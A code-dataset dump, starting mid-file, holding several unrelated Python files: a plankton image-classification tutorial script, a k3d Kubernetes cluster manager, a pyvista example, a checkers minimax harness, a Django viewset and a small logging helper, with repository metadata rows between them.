# make graphics inline
# Editor says this is an error.
# TODO: figure out why.
# %matplotlib inline -I've got IPython console set to "automatic," which yields
# a separate window for graphics
# In tutorial [2]: ( don't know why they include this)
import warnings
warnings.filterwarnings("ignore")
path = "./"
# Using .differences(...) removes any files in the dir train that have,
# extensions, i.e., are not subdirs, e.g., list.txt
train_dir_names = \
list(set(glob.glob(os.path.join(path, "train", "*"))).
difference(set(glob.glob(os.path.join(path, "train", "*.*")))))
train_dir_names.sort()
def getLargestRegion(props, labelmap, im_thresh):
regionmaxprop = None
for regionprop in props:
# check to see if the region is at least 50% nonzero
if sum(im_thresh[labelmap == regionprop.label])*1.0/regionprop.area < \
0.50:
continue
if regionmaxprop is None:
regionmaxprop = regionprop
if regionmaxprop.filled_area < regionprop.filled_area:
regionmaxprop = regionprop
return regionmaxprop
# In Tutorial [9]:
"""
Now, we collect the previous steps together in a function to make it easily
repeatable.
"""
# Adapted from Tutorial [9]:
def getMinorMajorRatio(image):
image = image.copy()
# Create the thresholded image to eliminate some of the background
im_thresh = np.where(image > np.mean(image), 0., 1.0)
# Dilate the image
im_dilated = morphology.dilation(im_thresh, np.ones((4, 4)))
# Create the label list
label_list = measure.label(im_dilated)
label_list = im_thresh*label_list
label_list = label_list.astype(int)
regionprops_list = measure.regionprops(label_list)
maxregion = getLargestRegion(regionprops_list, label_list, im_thresh)
# guard against cases where the segmentation fails by providing zeros
ratio = 0.0
if ((not maxregion is None) and (maxregion.major_axis_length != 0.0)):
ratio = 0.0 if maxregion is None else maxregion.minor_axis_length*1.0\
/ maxregion.major_axis_length
return ratio
"""
Preparing Training Data
With our code for the ratio of minor to major axis, let's add the raw pixel
values to the list of features for our dataset. In order to use the pixel
values in a model for our classifier, we need a fixed length feature vector, so
we will rescale the images to be constant size and add the fixed number of
pixels to the feature vector.
To create the feature vectors, we will loop through each of the directories in
our training data set and then loop over each image within that class. For each
image, we will rescale it to 25 x 25 pixels and then add the rescaled pixel
values to a feature vector, X. The last feature we include will be our
width-to-length ratio. We will also create the class label in the vector y,
which will have the true class label for each row of the feature vector, X.
"""
# Adapted from Tutorial [10]
# Rescale the images and create the combined metrics and training labels
# get the total training images
numberofImages = 0
for folder in train_dir_names:
for fileNameDir in os.walk(folder):
# fileNameDir will be a 3-tuple, (dirpath, dirnames, filenames)
# so we look at the last element, a list of the filenames
# print fileNameDir
for fileName in fileNameDir[2]:
# Only read in the images
if fileName[-4:] != ".jpg":
continue
numberofImages += 1
# We'll rescale the images to be 25x25=625
# Why 25? Why not 2**5 = 32?
maxPixel = 25
imageSize = maxPixel * maxPixel
num_rows = numberofImages # one row for each image in the training dataset
num_features = imageSize + 1 # for our ratio
# X is the ARRAY of feature vectors with one row of features per image
# consisting of the pixel values and our metric
X = np.zeros((num_rows, num_features), dtype=float)
# y is the numeric class label
# TODO why the double parens?
y = np.zeros((num_rows))
files = []
# Generate training data
i = 0
label = 0
# List of string of class names
namesClasses = list()
print "Reading images"
# Navigate through the list of directories
for folder in train_dir_names:
# Append the string class name for each class
currentClass = folder.split(os.pathsep)[-1]
print currentClass
namesClasses.append(currentClass)
for fileNameDir in os.walk(folder):
for fileName in fileNameDir[2]:
# Only read in the images
if fileName[-4:] != ".jpg":
continue
# Read in the images and create the features
nameFileImage = \
"{0}{1}{2}".format(fileNameDir[0], os.sep, fileName)
image = imread(nameFileImage, as_grey=True)
files.append(nameFileImage)
axisratio = getMinorMajorRatio(image)
# TODO: check out exactly how skimage resizes
image = resize(image, (maxPixel, maxPixel))
# Store the rescaled image pixels and the axis ratio
X[i, 0:imageSize] = np.reshape(image, (1, imageSize))
X[i, imageSize] = axisratio
# Store the classlabel
y[i] = label
i += 1
# report progress for each 5% done
report = [int((j+1)*num_rows/20.) for j in range(20)]
if i in report:
print np.ceil(i * 100.0 / num_rows), "% done"
label += 1
"""
Width-to-Length Ratio Class Separation
Now that we have calculated the width-to-length ratio metric for all the
images, we can look at the class separation to see how well our feature
performs. We'll compare pairs of the classes' distributions by plotting each
pair of classes. While this will not cover the whole space of hundreds of
possible combinations, it will give us a feel for how similar or dissimilar
different classes are in this feature, and the class distributions should be
comparable across subplots.
"""
# From Tutorial [12]
# Loop through the classes two at a time and compare their distributions of
# the Width/Length Ratio
# Create a DataFrame object to make subsetting the data on the class
df = pd.DataFrame({"class": y[:], "ratio": X[:, num_features-1]})
f = plt.figure(figsize=(30, 20))
# Suppress zeros and choose a few large classes to better highlight the
# distributions.
# Here "large" means images that have a large ratio of minor to major axis.
df = df.loc[df["ratio"] > 0]
minimumSize = 20
counts = df["class"].value_counts()
largeclasses = [int(x) for x in list(counts.loc[counts > minimumSize].index)]
# Loop through 40 of the classes
for j in range(0, 40, 2):
subfig = plt.subplot(4, 5, j / 2 + 1)
# Plot the normalized histograms for two classes
classind1 = largeclasses[j]
classind2 = largeclasses[j+1]
n, bins, p = plt.hist(df.loc[df["class"] == classind1]["ratio"].values,
alpha=0.5, bins=[x*0.01 for x in range(100)],
label=namesClasses[classind1].split(os.sep)[-1],
normed=1)
n2, bins, p = plt.hist(df.loc[df["class"] == (classind2)]["ratio"].values,
alpha=0.5, bins=bins,
label=namesClasses[classind2].split(os.sep)[-1],
normed=1)
subfig.set_ylim([0., 10.])
plt.legend(loc='upper right')
plt.xlabel("Width/Length Ratio")
# results = six histograms in 2x3 display
# TODO: this doesn't make sense, printing out 20 graphs on top of each other.
# Figure out how to display this reasonably.
"""
From the (truncated) figure above, you will see some cases where the classes
are well separated and others were they are not.
NB:
It is typical that one single
feature will not allow you to completely separate more than thirty distinct
classes. You will need to be creative in coming up with additional metrics to
discriminate between all the classes.
TODO: Figure out how CNN fits into this task.
"""
"""
TODO: Understand this thoroughly.
Random Forest Classification
We choose a random forest model to classify the images. Random forests perform
well in many classification tasks and have robust default settings. We will
give a brief description of a random forest model so that you can understand
its two main free parameters: n_estimators and max_features.
A random forest model is an ensemble model of n_estimators number of decision
trees. During the training process, each decision tree is grown automatically
by making a series of conditional splits on the data. At each split in the
decision tree, a random sample of max_features number of features is chosen and
used to make a conditional decision on which of the two nodes that the data
will be grouped in. The best condition for the split is determined by the split
that maximizes the class purity of the nodes directly below. The tree continues
to grow by making additional splits until the leaves are pure or the leaves
have less than the minimum number of samples for a split (in sklearn default
for min_samples_split is two data points). The final majority class purity of
the terminal nodes of the decision tree are used for making predictions on what
class a new data point will belong. Then, the aggregate vote across the forest
determines the class prediction for new samples.
With our training data consisting of the feature vector X and the class label
vector y, we will now calculate some class metrics for the performance of our
model, by class and overall. First, we train the random forest on all the
available data and let it perform the 5-fold cross validation. Then we perform
the cross validation using the KFold method, which splits the data into train
and test sets, and a classification report. The classification report provides
a useful list of performance metrics for your classifier vs. the internal
metrics of the random forest module.
"""
# From Tutorial [19]
print "Training"
# n_estimators is the number of decision trees
# max_features also known as m_try is set to the default value of the square
# root of the number of features
clf = RF(n_estimators=100, n_jobs=3);
scores = cross_validation.cross_val_score(clf, X, y, cv=5, n_jobs=1);
print "Accuracy of all classes"
print np.mean(scores)
"""
Tutorial Results:
Training
Accuracy of all classes
0.446073202468
# 2/?/2015
I got *very* close:
Accuracy of all classes
0.466980629201
# 2/21/2015 6:50pm Also very close
Training
Accuracy of all classes
0.466064989056
# 2/22/2015
Training
Accuracy of all classes
0.465496298508
"""
# From Tutorial [14]:
# TODO: Understand completely:
# sklearn.cross_validation import StratifiedKFold as KFold, including results
kf = KFold(y, n_folds=5)
y_pred = y * 0
for train, test in kf:
X_train, X_test, y_train, y_test=X[train, :], X[test, :], y[train], y[test]
clf = RF(n_estimators=100, n_jobs=3)
clf.fit(X_train, y_train)
y_pred[test] = clf.predict(X_test)
print classification_report(y, y_pred, target_names=namesClasses)
"""
The current model, while somewhat accurate overall, doesn't do well for all
classes, including the shrimp caridean, stomatopod, or hydromedusae tentacles
classes. For others it does quite well, getting many of the correct
classifications for trichodesmium_puff and copepod_oithona_eggs classes. The
metrics shown above for measuring model performance include precision, recall,
and f1-score.
The precision metric gives probability that a chosen class is correct,
(true positives / (true positive + false positives)),
while recall measures the ability of the model to correctly classify examples
of a given class,
(true positives / (false negatives + true positives)).
The F1 score is the geometric average of the precision and recall (the sqrt of
their product).
The competition scoring uses a multiclass log-loss metric to compute your
overall score. In the next steps, we define the multiclass log-loss function
and compute your estimated score on the training dataset.
"""
# From tutorial [16]:
def multiclass_log_loss(y_true, y_pred, eps=1e-15):
"""Multi class version of Logarithmic Loss metric.
https://www.kaggle.com/wiki/MultiClassLogLoss
Parameters
----------
y_true : array, shape = [n_samples]
true class, intergers in [0, n_classes - 1)
y_pred : array, shape = [n_samples, n_classes]
Returns
-------
loss : float
"""
predictions = np.clip(y_pred, eps, 1 - eps)
# normalize row sums to 1
predictions /= predictions.sum(axis=1)[:, np.newaxis]
actual = np.zeros(y_pred.shape)
n_samples = actual.shape[0]
actual[np.arange(n_samples), y_true.astype(int)] = 1
vectsum = np.sum(actual * np.log(predictions))
loss = -1.0 / n_samples * vectsum
return loss
# From tutor [17]:
# Get the probability predictions for computing the log-loss function
kf = KFold(y, n_folds=5)
# prediction probabilities number of samples, by number of classes
y_pred = np.zeros((len(y), len(set(y))))
for train, test in kf:
X_train, X_test, y_train, y_test = X[train,:], X[test,:], y[train], y[test]
clf = RF(n_estimators=100, n_jobs=3)
clf.fit(X_train, y_train)
y_pred[test] = clf.predict_proba(X_test)
# From tutorial [18]:
multiclass_log_loss(y, y_pred)
"""
Tutorial Results: 3.7390475458333374
My results - very close:
2/?/2015 3.7285067867109327
2/22/2015 3.7570415769375152
"""
""""
The multiclass log loss function is a classification error metric that heavily
penalizes you for being both confident (either predicting very high or very low
class probability) and wrong. Throughout the competition you will want to check
that your model improvements are driving this loss metric lower.
"""
"""
Where to Go From Here
Now that you've made a simple metric, created a model, and examined the model's
performance on the training data, the next step is to make improvements to your
model to make it more competitive. The random forest model we created does not
perform evenly across all classes and in some cases fails completely. By
creating new features and looking at some of your distributions for the problem
classes directly, you can identify features that specifically help separate
those classes from the others. You can add new metrics by considering other
image properties, stratified sampling, transformations, or other models for the
classification.
"""
| 36.443418 | 80 | 0.721229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10,181 | 0.645184 |
339ad92405feefc3b07ccc7b60e49d33ef95a496 | 14,810 | py | Python | src/k3d.py | maiki/k3x | dd817dbd2baf6eb40a4e7d043f41133ab7e120dc | [
"MIT"
] | 188 | 2020-04-23T07:58:04.000Z | 2022-03-30T19:39:29.000Z | src/k3d.py | maiki/k3x | dd817dbd2baf6eb40a4e7d043f41133ab7e120dc | [
"MIT"
] | 29 | 2020-06-08T16:09:08.000Z | 2022-03-21T21:52:30.000Z | src/k3d.py | maiki/k3x | dd817dbd2baf6eb40a4e7d043f41133ab7e120dc | [
"MIT"
] | 14 | 2020-06-24T13:56:58.000Z | 2022-03-16T12:13:54.000Z | # k3d.py
#
# Copyright 2020 Alvaro Saurin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import ssl
import subprocess
import time
import urllib.error
import urllib.request
import datetime
from dateutil.parser import parse
from typing import Dict, Iterator, List
from typing import Optional, Tuple, Callable
from gi.repository import GObject
from .config import APP_ENV_PREFIX
from .config import ApplicationSettings
from .config import (DEFAULT_EXTRA_PATH,
DEFAULT_API_SERVER_PORT_RANGE,
DEFAULT_K3D_WAIT_TIME)
from .docker import DockerController
from .helm import HelmChart, cleanup_for_owner
from .utils import (call_in_main_thread,
find_unused_port_in_range,
parse_or_get_address,
find_executable,
run_command_stdout)
from .utils_ui import show_notification
# the header/footer length in the "k3d list" output
K3D_LIST_HEADER_LEN = 3
K3D_LIST_FOOTER_LEN = 1
# directory in the K3s conatiner where we should put manifests for being automatically loaded
K3D_DOCKER_MANIFESTS_DIR = "/var/lib/rancher/k3s/server/manifests/"
###############################################################################
k3d_exe = find_executable("k3d", extra_paths=DEFAULT_EXTRA_PATH)
logging.debug(f"k3d found at {k3d_exe}")
def run_k3d_command(*args, **kwargs) -> Iterator[str]:
"""
Run a k3d command
"""
logging.debug(f"[K3D] Running k3d command: {args}")
yield from run_command_stdout(k3d_exe, *args, **kwargs)
###############################################################################
# errors
###############################################################################
class K3dError(Exception):
"""Base class for other k3d exceptions"""
pass
class EmptyClusterNameError(K3dError):
"""No cluster name"""
pass
class InvalidNumWorkersError(K3dError):
"""Invalid num workers"""
pass
class ClusterCreationError(K3dError):
"""Cluster creation error"""
pass
class ClusterDestructionError(K3dError):
"""Cluster destruction error"""
pass
class ClusterNotFoundError(K3dError):
"""Cluster not found error"""
pass
class NoKubeconfigObtainedError(K3dError):
"""No kubeconfig obtained error"""
pass
class NoServerError(K3dError):
"""No Docker server error"""
pass
###############################################################################
# k3d clusters
###############################################################################
class K3dCluster(GObject.GObject):
name: str = ""
status: str = "running"
num_workers: int = 0
use_registry: bool = False
registry_name: str = None
registry_port: str = None
registry_volume: str = None
cache_hub: bool = False
api_server: str = None
image: str = None
volumes: Dict[str, str] = {}
charts: List[HelmChart] = []
server_args: str = None
__gsignals__ = {
# a signal emmited when the cluster has been created
"created": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,)),
# a signal emmited when the cluster has been destroyed
"destroyed": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,))
}
def __init__(self, settings: ApplicationSettings, docker: DockerController, **kwargs):
super().__init__()
self._docker = docker
self._settings = settings
self._kubeconfig = None
self._docker_created: Optional[datetime.datetime] = None
self._docker_server_ip = None
self._destroyed = False
self._status = kwargs.pop("status", "running")
self.__dict__.update(kwargs)
# TODO: check the name is valid
if len(self.name) == 0:
raise InvalidNumWorkersError
if self.num_workers < 0:
raise InvalidNumWorkersError
def __str__(self) -> str:
return f"{self.name}"
def __eq__(self, other) -> bool:
if other is None:
return False
if isinstance(other, K3dCluster):
return self.name == other.name
if isinstance(other, str):
return self.name == other
logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
return NotImplemented
def __ne__(self, other) -> bool:
if other is None:
return True
if isinstance(other, K3dCluster):
return self.name != other.name
if isinstance(other, str):
return self.name != other
logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
return NotImplemented
def quit(self):
pass
def create(self, wait=True) -> None:
"""
Create the cluster by invoking `k3d create`
"""
args = []
kwargs = {}
if not self.name:
raise EmptyClusterNameError()
args += [f"--name={self.name}"]
if self.use_registry:
args += ["--enable-registry"]
if self.cache_hub:
args += ["--enable-registry-cache"]
if self.registry_volume:
args += [f"--registry-volume={self.registry_volume}"]
if self.registry_name:
args += [f"--registry-name={self.registry_name}"]
if self.registry_port:
args += [f"--registry-port={self.registry_port}"]
if wait:
args += [f"--wait={DEFAULT_K3D_WAIT_TIME}"]
if self.num_workers > 0:
args += [f"--workers={self.num_workers}"]
if self.image:
args += [f"--image={self.image}"]
# create some k3s server arguments
# by default, we add a custom DNS domain with the same name as the cluster
args += [f"--server-arg=--cluster-domain={self.name}.local"]
if self.server_args:
args += [f"--server-arg={arg}" for arg in self.server_args if len(arg) > 0]
# append any extra volumes
for vol_k, vol_v in self.volumes.items():
args += [f"--volume={vol_k}:{vol_v}"]
# append any extra Charts as volumes too
for chart in self.charts:
src = chart.generate(self)
dst = f"{K3D_DOCKER_MANIFESTS_DIR}/{chart.name}.yaml"
args += [f"--volume={src}:{dst}"]
# use the given API port or find an unused one
self.api_server = parse_or_get_address(self.api_server, *DEFAULT_API_SERVER_PORT_RANGE)
logging.info(f"[K3D] Using API address {self.api_server}")
args += [f"--api-port={self.api_server}"]
# check if we must use an env variable for the DOCKER_HOST
docker_host = self._docker.docker_host
default_docker_host = self._docker.default_docker_host
if docker_host != self._docker.default_docker_host:
logging.debug(f"[K3D] Overriding DOCKER_HOST={docker_host} (!= {default_docker_host})")
new_env = os.environ.copy()
new_env["DOCKER_HOST"] = docker_host
kwargs["env"] = new_env
try:
logging.info(f"[K3D] Creating cluster (with {args})")
while True:
try:
line = next(run_k3d_command("create", *args, **kwargs))
logging.debug(f"[K3D] {line}")
# detect errors in the output
if "level=fatal" in line:
raise ClusterCreationError(line.strip())
except StopIteration:
break
except Exception as e:
logging.error(f"Could not create cluster: {e}. Cleaning up...")
self._cleanup()
self._destroyed = True
raise e
logging.info("[K3D] The cluster has been created")
self._status = "running"
call_in_main_thread(lambda: self.emit("created", self.name))
def destroy(self) -> None:
"""
Destroy this cluster with `k3d delete`
"""
logging.info("[K3D] Destroying cluster")
if not self.name:
raise EmptyClusterNameError()
if self._destroyed:
raise ClusterDestructionError("Trying to destroy an already destroyed cluster")
args = []
args += [f"--name={self.name}"]
args += ["--keep-registry-volume"]
while True:
try:
line = next(run_k3d_command("delete", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
self._cleanup()
self._destroyed = True
call_in_main_thread(lambda: self.emit("destroyed", self.name))
def _cleanup(self) -> None:
"""
Cleanup any remaining things after destroying a cluster
"""
logging.debug(f"[K3D] Cleaning up for {self.name}")
cleanup_for_owner(self.name)
@property
def kubeconfig(self) -> Optional[str]:
"""
Get the kubeconfig file for this cluster, or None if no
"""
if self._destroyed:
return None
# cache the kubeconfig: once obtained, it will not change
if not self._kubeconfig:
for _ in range(0, 20):
try:
line = next(run_k3d_command("get-kubeconfig", f"--name={self.name}"))
except StopIteration:
break
except subprocess.CalledProcessError:
logging.debug(f"[K3D] ... KUBECONFIG for {self.name} not ready yet...")
time.sleep(1)
else:
logging.debug(f"[K3D] ... obtained KUBECONFIG for {self.name} at {line}")
self._kubeconfig = line
break
return self._kubeconfig
@property
def running(self) -> bool:
return self._status == "running"
def start(self) -> None:
if not self.running:
args = []
args += [f"--name={self.name}"]
logging.debug(f"[K3D] Starting {self.name}...")
while True:
try:
line = next(run_k3d_command("start", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
def stop(self) -> None:
if self.running:
args = []
args += [f"--name={self.name}"]
logging.debug(f"[K3D] Stopping {self.name}...")
while True:
try:
line = next(run_k3d_command("stop", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
@property
def docker_created(self) -> Optional[datetime.datetime]:
if self._destroyed:
return None
if self._docker_created is None:
c = self._docker.get_container_by_name(self.docker_server_name)
if c:
t = self._docker.get_container_created(c)
if t:
try:
self._docker_created = parse(t)
except Exception as e:
logging.error(f"[K3D] could not parse time string {t}: {e}")
return self._docker_created
@property
def docker_server_name(self) -> Optional[str]:
if self._destroyed:
return None
return f"k3d-{self.name}-server"
@property
def docker_network_name(self) -> Optional[str]:
if self._destroyed:
return None
return f"k3d-{self.name}"
@property
def docker_server_ip(self) -> Optional[str]:
if self._destroyed:
return None
if not self._docker_server_ip:
c = self._docker.get_container_by_name(self.docker_server_name)
if c:
ip = self._docker.get_container_ip(c, self.docker_network_name)
if ip is None:
raise NoServerError(
f"could not obtain server IP for {self.docker_server_name} in network {self.docker_network_name}")
self._docker_server_ip = ip
return self._docker_server_ip
@property
def dashboard_url(self) -> Optional[str]:
if self._destroyed:
return None
ip = self.docker_server_ip
if ip:
return f"https://{self.docker_server_ip}/"
def check_dashboard(self, *args) -> bool:
"""
Check that the Dashboard is ready
"""
try:
context = ssl._create_unverified_context()
return urllib.request.urlopen(self.dashboard_url, context=context).getcode()
except urllib.error.URLError as e:
logging.info(f"Error when checking {self.dashboard_url}: {e}")
return False
def open_dashboard(self, *args) -> None:
import webbrowser
u = self.dashboard_url
if u is not None:
logging.debug(f"[K3D] Opening '{u}' in default web browser")
webbrowser.open(u)
else:
logging.warning(f"[K3D] No URL to open")
@property
def script_environment(self) -> Dict[str, str]:
"""
Return a dictionary with env variables for running scripts for this cluster
"""
# Note: make sure we do not return any non-string value or subprocess.run will throw an exception.
env = {
f"{APP_ENV_PREFIX}_CLUSTER_NAME": str(self.name),
}
if not self._destroyed:
env.update({
f"{APP_ENV_PREFIX}_REGISTRY_ENABLED": "1" if self.use_registry else "",
f"{APP_ENV_PREFIX}_REGISTRY_NAME": str(self.registry_name) if self.registry_name else "",
f"{APP_ENV_PREFIX}_REGISTRY_PORT": str(self.registry_port) if self.registry_port else "",
f"{APP_ENV_PREFIX}_MASTER_IP": str(self.docker_server_ip) if self.docker_server_ip is not None else "",
f"{APP_ENV_PREFIX}_KUBECONFIG": self.kubeconfig if self.kubeconfig is not None else "",
})
return env
GObject.type_register(K3dCluster)
| 32.336245 | 122 | 0.576637 | 12,235 | 0.826131 | 208 | 0.014045 | 3,664 | 0.2474 | 0 | 0 | 4,648 | 0.313842 |
339c2850fe3848ca48de45f881ca59f6d9fd81f3 | 153 | py | Python | locale/pot/api/utilities/_autosummary/pyvista-Disc-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
] | 4 | 2020-08-07T08:19:19.000Z | 2020-12-04T09:51:11.000Z | locale/pot/api/utilities/_autosummary/pyvista-Disc-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
] | 19 | 2020-08-06T00:24:30.000Z | 2022-03-30T19:22:24.000Z | locale/pot/api/utilities/_autosummary/pyvista-Disc-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
] | 1 | 2021-03-09T07:50:40.000Z | 2021-03-09T07:50:40.000Z | # Create a disc with 50 points in the circumferential direction.
#
import pyvista
mesh = pyvista.Disc(c_res=50)
mesh.plot(show_edges=True, line_width=5)
| 25.5 | 64 | 0.784314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.424837 |
339d94c7e05fc5f397dd56538bd484357362ee32 | 7,364 | py | Python | gamemaster.py | josephko91/checkers-ai | e5963ffebf9a64724604a620d2432c1798505c22 | [
"MIT"
] | null | null | null | gamemaster.py | josephko91/checkers-ai | e5963ffebf9a64724604a620d2432c1798505c22 | [
"MIT"
] | null | null | null | gamemaster.py | josephko91/checkers-ai | e5963ffebf9a64724604a620d2432c1798505c22 | [
"MIT"
] | null | null | null | import os
from utility import write_to_output, print_board, color_is_black, board_to_list, print_results
from board import Board
import time
from algorithm import minimax, minimax_alpha_beta, minimax_alpha_beta_final, minimax_alpha_beta_rand
from math import sqrt, floor
start = time.time()
# parse input file
with open("input.txt", "r") as input_file:
game_mode = input_file.readline().rstrip() # 1st line: game mode
color = input_file.readline().rstrip() # 2nd line: player color
time_left = float(input_file.readline().rstrip()) # 3rd line: remaining time
board_list = []
for i in range(8): # next 8 lines: 2-d list representing the board
board_list.append(list(input_file.readline().rstrip()))
# create initial board object
is_black = color_is_black(color)
start = time.time()
board = Board(board_list, is_black)
end = time.time()
print("time to make board object =", end - start)
# write mean runtimes to calibrate.txt
with open('test.txt', 'w') as output:
# print description of game
print("d_b = 4; d_w = 4; simple heuristic for both b/w", file = output)
#print("v3 changes: changed king weight from 30 to 20, added delta weight to small opp piece case", file = output)
# play 100 games and store in game_results_1.txt
black_wins = 0
white_wins = 0
timeouts = 0
for i in range(10):
start = time.time()
# parse input file
with open("input.txt", "r") as input_file:
game_mode = input_file.readline().rstrip() # 1st line: game mode
color = input_file.readline().rstrip() # 2nd line: player color
time_left = float(input_file.readline().rstrip()) # 3rd line: remaining time
board_list = []
for i in range(8): # next 8 lines: 2-d list representing the board
board_list.append(list(input_file.readline().rstrip()))
# create initial board object
is_black = color_is_black(color)
start = time.time()
board = Board(board_list, is_black)
end = time.time()
print("time to make board object =", end - start)
max_iterations = 100
iteration_count = 1
total_time_black = 0
total_time_white = 0
# loop until someone wins or maximum iterations exceeded
while True:
start = time.time()
minimax_alpha_beta_rand.count = 0
minimax_alpha_beta_final.count = 0
move_count = floor(iteration_count/2)
if board.active_player: # black's turn
# if iteration_count > 50:
# if move_count % 2 == 0:
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 1, float("-inf"), float("inf"), True, (), board)
# # elif move_count % 9 == 0:
# # value, result, new_board = minimax_alpha_beta(board, 8, float("-inf"), float("inf"), True)
# else:
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 6, float("-inf"), float("inf"), True, (), board)
if move_count%2 == 0:
value, result, new_board = minimax_alpha_beta_final(board, board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
else:
value, result, new_board = minimax_alpha_beta_final(board, board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
# if move_count < 5:
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
# elif board.num_pieces_black < 4:
# if move_count%2 == 0:
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
# else:
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
# else:
# if move_count%2 == 0:
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
# else:
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
else: # white's turn
# value, result, new_board = minimax_alpha_beta(board, board.active_player, 4, 4, float("-inf"), float("inf"), True, (), board)
if move_count%2 == 0:
value, result, new_board = minimax_alpha_beta_rand(board, board, board.active_player, 2, 2, float("-inf"), float("inf"), True, (), board)
else:
value, result, new_board = minimax_alpha_beta_rand(board, board, board.active_player, 2, 2, float("-inf"), float("inf"), True, (), board)
end = time.time()
runtime = end - start
# if we run into a blocked board with lots of pieces left (i.e. it wasn't caught in game_over method):
if result == None:
print("total time black =", total_time_black)
print("total time white =", total_time_white)
if board.num_pieces_black == 0:
white_wins += 1
elif board.num_pieces_white == 0:
black_wins += 1
else:
timeouts += 1
break
# set up new board
board = new_board
# create new board_list (for printing later)
board_list = board_to_list(board)
# print result to game_output.txt
print_results(board, result, board_list, iteration_count, runtime)
# accumulate total runtime
if board.active_player: # black's total time
total_time_black += runtime
else: # white's total time
total_time_white += runtime
# switch player
board.active_player = not board.active_player
# break loop if someone won or exceeded max iterations
if board.game_over() or iteration_count >= max_iterations:
print("total time black =", total_time_black)
print("total time white =", total_time_white)
if board.num_pieces_black == 0:
white_wins += 1
elif board.num_pieces_white == 0:
black_wins += 1
else:
timeouts += 1
break
iteration_count += 1
# print final results to file
print("black wins =", black_wins, file = output)
print("white wins =", white_wins, file = output)
print("timeouts =", timeouts, file = output)
# def print_results(board, result, board_list, iteration_count, runtime):
# if board.active_player == True:
# player = "black"
# else:
# player = "white"
# print("iteration:", iteration_count)
# print("runtime:", runtime)
# print("player:", player)
# print("move:", result)
# for row in board_list:
# print(row) | 48.768212 | 158 | 0.576589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,071 | 0.417029 |
339e1f9b6047c43589a665151b5f5b6446ffe99f | 1,407 | py | Python | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/views/image_version_license.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from django.db.models import Q
import django_filters
from core.models import ApplicationVersionLicense as ImageVersionLicense
from api.v2.serializers.details import ImageVersionLicenseSerializer
from api.v2.views.base import AuthModelViewSet
class VersionFilter(django_filters.FilterSet):
version_id = django_filters.CharFilter(method='filter_by_uuid')
created_by = django_filters.CharFilter(method='filter_owner')
def filter_owner(self, queryset, name, value):
return queryset.filter(
Q(image_version__created_by__username=value) |
Q(image_version__application__created_by__username=value)
)
def filter_by_uuid(self, queryset, name, value):
# NOTE: Remove this *HACK* once django_filters supports UUID as PK fields
return queryset.filter(image_version__id=value)
class Meta:
model = ImageVersionLicense
fields = ['version_id', 'created_by']
class ImageVersionLicenseViewSet(AuthModelViewSet):
"""
API endpoint that allows version tags to be viewed
"""
queryset = ImageVersionLicense.objects.none()
serializer_class = ImageVersionLicenseSerializer
filter_class = VersionFilter
def get_queryset(self):
"""
Filter out tags for deleted versions
"""
return ImageVersionLicense.objects.filter(
image_version__created_by=self.request.user)
| 33.5 | 81 | 0.734186 | 1,158 | 0.823028 | 0 | 0 | 0 | 0 | 0 | 0 | 253 | 0.179815 |
339ebff6a47b6fc0d76354525972cdafcdf197e6 | 216 | py | Python | osvolbackup/verbose.py | CCSGroupInternational/osvolbackup | d0d93812a729acdb6c961c6bdd1cc2cb5c9c87f5 | [
"Apache-2.0"
] | 1 | 2019-02-27T12:59:49.000Z | 2019-02-27T12:59:49.000Z | osvolbackup/verbose.py | CCSGroupInternational/osvolbackup | d0d93812a729acdb6c961c6bdd1cc2cb5c9c87f5 | [
"Apache-2.0"
] | 4 | 2019-03-07T09:31:51.000Z | 2019-03-12T15:19:40.000Z | osvolbackup/verbose.py | CCSGroupInternational/osvolbackup | d0d93812a729acdb6c961c6bdd1cc2cb5c9c87f5 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
from os import getenv
from datetime import datetime
def vprint(*a, **k):
if not getenv('VERBOSE'):
return
print(datetime.now(), ' ', end='')
print(*a, **k)
| 19.636364 | 38 | 0.643519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.064815 |
